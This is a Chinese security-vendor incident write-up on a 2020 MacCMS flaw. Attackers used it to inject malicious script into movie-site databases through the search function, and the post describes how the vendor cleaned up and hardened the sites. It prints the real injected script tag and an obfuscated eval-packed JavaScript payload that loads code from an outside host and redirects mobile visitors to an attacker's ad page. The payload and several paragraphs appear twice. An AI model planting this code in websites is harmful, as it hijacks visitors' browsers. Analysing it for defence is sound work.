苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在
2020年初该maccms漏洞爆发了,目前极少数的攻击者掌握了该EXP POC,受该BUG的影响
,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被挂马的
问题,通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码,
<script src=https://lefengtv.com/js/tjj.js></script>,尤其电影片名d_name值被直接篡改,并
且是批量挂马,导致用户打开网站访问直接弹窗广告并跳转。
JS挂马代码如下:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>3
5?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e
(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)
if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<6 1="3/2"
7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script
|src|20569875|scr|ipt|users|51|la'.split('|'),0,{}));var abcdefg=navigator["userAgent
"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphon
e|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(abcdefg){setTimeout(
'window.location.href="https://m.zhuanjiyin.net:168/index.html?u=80666"',500)}
5?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e
(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)
if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<6 1="3/2"
7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script
|src|20569875|scr|ipt|users|51|la'.split('|'),0,{}));var abcdefg=navigator["userAgent
"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphon
e|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(abcdefg){setTimeout(
'window.location.href="https://m.zhuanjiyin.net:168/index.html?u=80666"',500)}
上面恶意代码对访问用户进行了判断,如果是手机端的,IOS,安卓,以及平板都会跳转到攻
击者设置好的广告网页当中去,
击者设置好的广告网页当中去,
https://m.zhuanjiyin.net:168/index.html?u=80666就是跳转到这里,根据我们SINE安全技术的
分析与统计,大部分被攻击的网站跳转都是168端口的网址上,域名经常变换,但是168端口
没有变,可以看出是同一个攻击者所为。
分析与统计,大部分被攻击的网站跳转都是168端口的网址上,域名经常变换,但是168端口
没有变,可以看出是同一个攻击者所为。
电影网站被挂马的特征就是以上这些情况,根据客户的反馈以及提供服务器IP,root账号密码后,
我们进去对苹果cms的源代码进行了全面的人工安全审计,在网站的根目录下生成了webshell网
站木马后门文件,在缓存目录中也发现了同样的网站木马,继续溯源追踪,查看nginx网站日志,
发现用的是同样的手段,我们SINE安全技术再熟悉不过了,通过post index.php搜索功能进行插
入数据库并嵌入挂马代码,漏洞产生的原因是电影搜索里可以插入恶意代码,攻击者将恶意代码
加密后,不管你服务器用云锁,还是宝塔,安全狗,都是拦截不了的,还是会被篡改。
我们进去对苹果cms的源代码进行了全面的人工安全审计,在网站的根目录下生成了webshell网
站木马后门文件,在缓存目录中也发现了同样的网站木马,继续溯源追踪,查看nginx网站日志,
发现用的是同样的手段,我们SINE安全技术再熟悉不过了,通过post index.php搜索功能进行插
入数据库并嵌入挂马代码,漏洞产生的原因是电影搜索里可以插入恶意代码,攻击者将恶意代码
加密后,不管你服务器用云锁,还是宝塔,安全狗,都是拦截不了的,还是会被篡改。
我们SINE安全技术随即对客户的苹果CMS漏洞进行了修复,对POST过来的数据进行了严格的安
全过滤与检测,对攻击者加密的代码也进行了特征定位拦截。只要包含了该恶意内容,直接拦截
并返回错误提示。对网站根目录下存在的webshell也进行了删除。对客户网站的缓存目录,以及
图片目录,JS目录都做了安全部署与加固,防止php脚本文件在网站的运行,对网站的管理员后
台进行了权限分离,更新采集,与网站前端访问使用2个数据库账号,1个只读权限的数据库账
号,1个后台采集可写的数据库账号,这在安全层面上来说,网站安全等级更高了,一般攻击者无
法攻击与篡改。我们即修复了漏洞,也做了安全拦截与多层次的安全加固部署,至此客户网站数
据库被挂马的问题得以解决。
全过滤与检测,对攻击者加密的代码也进行了特征定位拦截。只要包含了该恶意内容,直接拦截
并返回错误提示。对网站根目录下存在的webshell也进行了删除。对客户网站的缓存目录,以及
图片目录,JS目录都做了安全部署与加固,防止php脚本文件在网站的运行,对网站的管理员后
台进行了权限分离,更新采集,与网站前端访问使用2个数据库账号,1个只读权限的数据库账
号,1个后台采集可写的数据库账号,这在安全层面上来说,网站安全等级更高了,一般攻击者无
法攻击与篡改。我们即修复了漏洞,也做了安全拦截与多层次的安全加固部署,至此客户网站数
据库被挂马的问题得以解决。
有很多客户的电影网站都到maccms官方进行了更新与补丁下载,但安装后还是会继续被挂马,这
里跟大家说一下,目前官方的漏洞补丁对此次数据库挂马漏洞是没有任何效果的。如果不知道如
何对苹果cms漏洞进行修复以及打补丁,建议找专业的网站安全公司来处理,对index.php搜索功
能这里做安全过滤与拦截,对加密的特征码进行解密定位,更新到拦截黑名单中,即可修复该苹
果CMS漏洞。
里跟大家说一下,目前官方的漏洞补丁对此次数据库挂马漏洞是没有任何效果的。如果不知道如
何对苹果cms漏洞进行修复以及打补丁,建议找专业的网站安全公司来处理,对index.php搜索功
能这里做安全过滤与拦截,对加密的特征码进行解密定位,更新到拦截黑名单中,即可修复该苹
果CMS漏洞。